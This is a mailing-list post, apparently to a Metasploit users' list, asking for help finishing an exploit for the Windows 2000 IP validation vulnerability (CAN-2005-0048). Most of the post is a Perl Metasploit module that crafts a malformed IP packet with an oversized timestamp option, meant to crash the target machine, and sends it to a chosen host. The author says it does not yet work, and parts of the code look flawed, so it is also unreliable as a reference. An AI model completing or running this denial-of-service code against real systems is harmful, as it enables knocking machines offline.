Need Help with Exploit

[mjreilly at wam.umd.edu (Michael James Reilly)]

Hello,

I'm currently working over at the University of Maryland trying to develop 
an exploit for the IP Validation Vulnerability in Windows 2000 Server SP0 
(CAN-2005-0048).  Unfortunately, this vulnerability requires manipulating 
the header of an IP Packet, and since we don't have much experience with 
the Metasploit libraries, we're having some trouble getting this exploit 
off the ground.

It seems to me that someone with more experience could probably figure 
this one out in about a half hour!  Can anyone help us figure out how to 
get this exploit working?  C and Perl PoCs are available at 
http://www.securityfocus.com/bid/13116/exploit.

The trick to getting this exploit to work (in theory) is using an IP 
option with option size set to 39, but with 40 bytes included with the 
option (1 byte for the option code, 1 byte for the option size, and 38 
bytes for the option data).

Here's what we've been trying to work out:

### BEGIN SNIP ###

sub Exploit {
#Standard beginning stuff
     my $self = shift ;

     my $targethost = $self->GetVar('RHOST');
     my $targetport = $self->GetVar('RPORT');
     my $sourcehost = $self->GetVar('LHOST');
     my $sourceport = $self->GetVar('LPORT');

# For this exploit we can't just blindly use the Msf::Socket::Tcp class
# Instead, we either need to figure out how to change the IP packet header
# in an instance of the class, OR we'll have to use the Metasploit class
# as a basis (NOT a base class, necessarily) for a small class that gives
# us control of the IP header.  The code below is dedicated to making our
# packet.  Any payload code should be handled first above these lines, if 
# we end up using a payload.  The packet below should crash the target 
# computer, according to the security reports on this vuln.

     my $rpkt = NetPacket::IP->decode() ;
     $rpkt->{ver}        = 4;
     $rpkt->{hlen}       = 15; # 15 words = 60 bytes = 20 bytes for regular header info
                               #                      + 1 byte for option
                               #                      + 1 byte for option size (set to 39 instead of 40)
                               #                      +38 bytes of junk data
     $rpkt->{id}         = rand();
     $rpkt->{proto}      = 6;
     $rpkt->{ttl}        = 64;
     $rpkt->{src_ip}     = $sourcehost;
     $rpkt->{dest_ip}    = $targethost;
     $rpkt->{tos}        = 0;
     $rpkt->{len}        = 80;
     $rpkt->{options}    = "";
     $rpkt->{foffset}    = 0;
     $rpkt->{flags}      = 0;

     my $tpkt = NetPacket::TCP->decode();
     $tpkt->{src_port}   = 0;
     $tpkt->{dest_port}  = 0;
     $tpkt->{seqnum}     = 0;
     $tpkt->{acknum}     = 0;
     $tpkt->{flags}      = 0;
     $tpkt->{winsize}    = 512;
     $tpkt->{cksum}      = 0;
     $tpkt->{urg}        = 0;
     $tpkt->{options}    = "";
     $tpkt->{hlen}       = 5;
     $tpkt->{reserved}   = 0;
     $tpkt->{data}       = "";

     # specially crafted encode functionality:

     my ($hdr,$packet,$zero,$tmp,$offset);
     my ($src_ip, $dest_ip);

     # create a zero variable
     $zero = 0;

     # adjust the length of the packet
     $rpkt->{len} = ($rpkt->{hlen} * 4) + length($rpkt->{data});

     $tmp = $rpkt->{hlen} & 0x0f;
     $tmp = $tmp | (($rpkt->{ver} << 4) & 0xf0);

     $offset = $rpkt->{flags} << 13;
     $offset = $offset | (($rpkt->{foffset} >> 3) & 0x1fff);

     # convert the src and dst ip
     $src_ip = gethostbyname($rpkt->{src_ip});
     $dest_ip = gethostbyname($rpkt->{dest_ip});

     # Build option bytes (40 bytes)
     my $option = "68"; # timestamp option (http://www.freesoft.org/CIE/Course/Section3/7.htm) (byte 1)
     my $optionlen = "39"; # "length" (byte 2)
     my $optionpadding = "E" x 38 ; # bytes 3 - 40

     # construct header to calculate the checksum
     $hdr = pack('CCnnnCCna4a4CCC38', $tmp, $rpkt->{tos},$rpkt->{len},
          $rpkt->{id}, $offset, $rpkt->{ttl}, $rpkt->{proto},
          $zero, $src_ip, $dest_ip, $option, $optionlen, $optionpadding);

     $rpkt->{cksum} = NetPacket::htons(NetPacket::in_cksum($hdr));

     $rpkt->{data} = $tpkt->encode($rpkt);

     # make the entire packet
     $packet = pack('CCnnnCCna4a4CCC38a*', $tmp, $rpkt->{tos},$rpkt->{len},
          $rpkt->{id}, $rpkt->{foffset}, $rpkt->{ttl}, $rpkt->{proto},
          $rpkt->{cksum}, $src_ip, $dest_ip, $option, $optionlen, $optionpadding,
          $rpkt->{data});

     my $s = Msf::Socket::Tcp->new( 'PeerAddr'  => $targethost, 'PeerPort'  => $targetport,);
     if ($s->IsError) {
        $self->PrintLine("[*] Socket Error: " . $s->GetError());
        return;
     }
     $s->Send($packet);
     $self->Handler($s);

     return;
}

### END SNIP ###

Thanks far any help you can offer,
  - Michael Reilly